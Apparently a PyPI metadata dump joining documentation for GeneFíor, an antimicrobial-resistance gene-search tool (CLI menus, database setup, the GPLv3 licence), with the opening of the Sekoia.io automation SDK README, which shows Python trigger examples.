# Basic usage with default tools (runs DNA & protein tools)
AMRfior -i reads.fasta -st Single-FASTA -o results/
# Select specific tools and output detected FASTA sequences
AMRfior -i reads.fasta -st Single-FASTA -o results/ --tools diamond bowtie2 --report_fasta detected
# Custom thresholds, paired-fastq input, threads and dna-only mode
AMRfior -i reads_R1.fastq,reads_R2.fastq -st Paired-FASTQ -o results/ -t 16 --d-min-cov 90 --d-min-id 85 --dna-only
```
## Menu for Genefíor-Recompute (Genefíor-Recompute or genefíor-recompute):
### Genefíor-Recompute is used to recalculate detection statistics from existing sequence search outputs with different thresholds without needing to rerun the entire analysis.
```commandline
GeneFíor-Recompute: Recalculate detection statistics from existing sequence search outputs
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory containing Genefíor results (with
raw_outputs/ subdirectory)
-o OUTPUT, --output OUTPUT
Output directory for recomputed results
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,all} ...]
Specify which tools to recompute - "all" will
recompute for all detected tools (default: all)
Query threshold Parameters:
--q-min-cov QUERY_MIN_COVERAGE, --query-min-coverage QUERY_MIN_COVERAGE
Minimum coverage threshold in percent (default: 40.0)
Gene Detection Parameters:
--d-min-cov DETECTION_MIN_COVERAGE, --detection-min-coverage DETECTION_MIN_COVERAGE
Minimum coverage threshold in percent (default: 80.0)
--d-min-id DETECTION_MIN_IDENTITY, --detection-min-identity DETECTION_MIN_IDENTITY
Minimum identity threshold in percent (default: 80.0)
--d-min-base-depth DETECTION_MIN_BASE_DEPTH, --detection-min-base-depth DETECTION_MIN_BASE_DEPTH
Minimum average base depth for detection - calculated
against regions of the detected gene with at least one
read hit (default: 1.0)
--d-min-reads DETECTION_MIN_NUM_READS, --detection-min-num-reads DETECTION_MIN_NUM_READS
Minimum number of reads required for detection
(default: 1)
Output Parameterts:
--report-fasta {None,all,detected,detected-all}
Specify whether to output sequences that "mapped" to
genes."all" should only be used for deep
investigation/debugging."detected" will report the
reads that passed detection thresholds for each
detected gene."detected-all" will report all reads for
each detected gene. (default: None)
--query-fasta QUERY_FASTA
Specify the original query FASTA/FASTQ file used for
alignment (required for reporting mapped sequences for
BLAST/DIAMOND).
Miscellaneous Parameters:
-v, --version Show program version and exit
Examples:
# Recompute with different thresholds
Genefior-recompute -i original_results/ -o recomputed_90_90/ \
--d-min-cov 90 --d-min-id 90
# More stringent depth requirement
Genefior-recompute -i original_results/ -o high_depth/ \
--d-min-base-depth 5.0 --d-min-reads 10
```
## Menu for Genefíor-Gene-Stats (Genefíor-Gene-Stats or genefíor-gene-stats):
### Genefíor-Gene-Stats is used to generate summary statistics and visualizations from Genefíor results.
```commandline
Genefíor-Gene-Stats: Generate detailed coverage visualisations for Gene genes
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input directory containing Genefíor results
-o OUTPUT, --output OUTPUT
Output directory for visualisation reports
-g GENES, --genes GENES
Comma-separated gene names (FULL NAMES) or path to file with gene names (one per line)
--databases {resfinder,card,ncbi} [{resfinder,card,ncbi} ...]
Database(s) to interrogate
--tools {blastn,blastx,diamond,bowtie2,bwa,minimap2,all} [{blastn,blastx,diamond,bowtie2,bwa,minimap2,all} ...]
Tool(s) to interrogate
--ref-fasta REF_FASTA
NOT IMPLEMENTED YET - Reference FASTA file for variant calling (optional)
--query-fasta QUERY_FASTA
NOT IMPLEMENTED YET - Query FASTA file (your input reads) for BLAST base-level analysis (optional)
Examples:
# Visualise specific genes (FULL NAMES) from all tools
Genefior-gene-stats -i results/ -o vis/ \
-g "sul1_2_U12338,tet(W)|ARO:3000194" \
--databases resfinder card \
--tools diamond bowtie2 bwa
# Visualise from gene (FULL NAMES) list file with reference
Genefior-gene-stats -i results/ -o vis/ \
-g genes_of_interest.txt \
--databases resfinder \
--tools blastn diamond
```
## Database Setup: See /src/Genefior/databases/ for details on setting up user-provided databases.
### Genefíor includes an automated script in the Databases directory to automate the setup of user-provided databases.
### MMseqs2 database layout
Genefíor now supports MMseqs2 databases in the same explicit layout used for BLAST (separate directories for AA and DNA).
- The expected directory names for user-provided mmseqs databases are:
- `mmseqs_aa/` (contains amino-acid/protein mmseqs DBs)
- `mmseqs_dna/` (contains nucleotide mmseqs DBs)
This mirrors the `blast_aa/` and `blast_dna/` layout and allows the pipeline to select the correct DB for
protein (aa→aa or translated nt→aa) and nucleotide (nt→nt) searches.
#### Building mmseqs DBs with the bundled script
- The provided script `src/GeneFior/databases/build_database.sh` will create both MMseqs DB types when given
a nucleotide and a protein FASTA.
Example (build a user database named `mydb` from `genes_nt.fasta` and `genes_aa.fasta`):
```bash
./src/GeneFior/databases/build_database.sh mydb genes_nt.fasta genes_aa.fasta 8
```
After running the script the structure will include:
```
mydb/
blast_aa/ # BLAST protein DB
blast_dna/ # BLAST nucleotide DB
mmseqs_aa/ # MMseqs protein DB(s)
mmseqs_dna/ # MMseqs nucleotide DB(s)
diamond/
bowtie2/
bwa/
minimap2/
```
Notes:
- The `<database>` token in filenames is the database identifier used by Genefíor (for user-provided DBs this is `user-provided-db` by default in the CLI output). If you change the DB name or add multiple user DBs, the filenames will use the corresponding database key.
| text/markdown | null | Nicholas Dimonaco <nicholas@dimonaco.co.uk> | null | null | GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
| Antimicrobial Resistance, Sequence Searching | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: OS Independent"
] | [] | null | null | >=3.10 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/NickJD/GeneFior",
"Bug Tracker, https://github.com/NickJD/GeneFior/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:21:30.291160 | genefior-0.6.0.tar.gz | 54,766,306 | 73/6c/5eeb114e86195d17290f4d0dd8ffb07f1bf8f0dcbdc46db94c2b820d294b/genefior-0.6.0.tar.gz | source | sdist | null | false | 0d1bbdeaf1880a698e9ae1d3380f0e95 | 69d7b90715e5527ce686b4e8f1c6e1c9fd901c5af8d8e22a442e8d8ee44be990 | 736c5eeb114e86195d17290f4d0dd8ffb07f1bf8f0dcbdc46db94c2b820d294b | null | [
"LICENSE"
] | 0 |
2.4 | sekoia-automation-sdk | 1.22.3 | SDK to create Sekoia.io playbook modules | # Sekoia.io Automation Python SDK
[](https://github.com/SEKOIA-IO/sekoia-automation-sdk/actions/workflows/ci.yml)
[](https://codecov.io/github/SEKOIA-IO/sekoia-automation-sdk)
[](https://pypi.org/project/sekoia-automation-sdk/)
[](https://pypi.org/project/sekoia-automation-sdk/)
SDK to create Sekoia.io playbook modules.
Modules can define:
* Triggers: daemons that create events that will start a playbook run
* Actions: short-lived programs that constitute the main playbook nodes. They take arguments and produce a result.
## Create a trigger
Here is how you could define a very basic trigger:
```python
from sekoia_automation.module import Module
from sekoia_automation.trigger import Trigger


class MyTrigger(Trigger):
    def run(self):
        while True:
            # Do some stuff
            self.send_event('event_name', {'somekey': 'somevalue'})
            # Maybe wait some time


if __name__ == "__main__":
    module = Module()
    module.register(MyTrigger)
    module.run()
```
You can access the Trigger's configuration with `self.configuration` and the module configuration with `self.module.configuration`.
### Attach files to an event
You can attach files to an event so that these files are available to the playbook runs.
Here is how you could create a file that should be available to the playbook run:
```python
import os

from sekoia_automation import constants
from sekoia_automation.trigger import Trigger


class MyTrigger(Trigger):
    def run(self):
        while True:
            # Create a directory and a file
            directory_name = "test_dir"
            dirpath = os.path.join(constants.DATA_STORAGE, directory_name)
            os.makedirs(dirpath)
            with open(os.path.join(dirpath, "test.txt"), "w") as f:
                f.write("Hello !")

            # Attach the file to the event
            self.send_event('event_name', {'file_path': 'test.txt'}, directory_name)
            # Maybe wait some time
```
Please note that:
* `send_event`'s third argument should be the path of a directory, relative to `constants.DATA_STORAGE`
* The directory will be the root of the playbook run's storage ("test.txt" will exist, not "test_dir/test.txt")
* You can ask the SDK to automatically remove the directory after it was copied with `remove_directory=True`
* You should always do `from sekoia_automation import constants` and use `constants.DATA_STORAGE` so that it is easy to mock
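The reason the `from sekoia_automation import constants` style matters for mocking can be shown without the SDK. In this standalone sketch (the `constants` object is a hypothetical stand-in, not the real module), an attribute looked up at call time sees the patched value, while a value copied at import time does not:

```python
import types

# Stand-in for a constants module (hypothetical, just for this demo)
constants = types.SimpleNamespace(DATA_STORAGE="/data")

def storage_dir_late():
    # the attribute is looked up at call time, so a test that patches
    # constants.DATA_STORAGE is picked up here
    return constants.DATA_STORAGE

DATA_STORAGE = constants.DATA_STORAGE  # value copied once, at import time

def storage_dir_early():
    # keeps the original value even after the attribute is patched
    return DATA_STORAGE

constants.DATA_STORAGE = "/tmp/test-storage"  # what a test mock would do
print(storage_dir_late())   # /tmp/test-storage
print(storage_dir_early())  # /data
```

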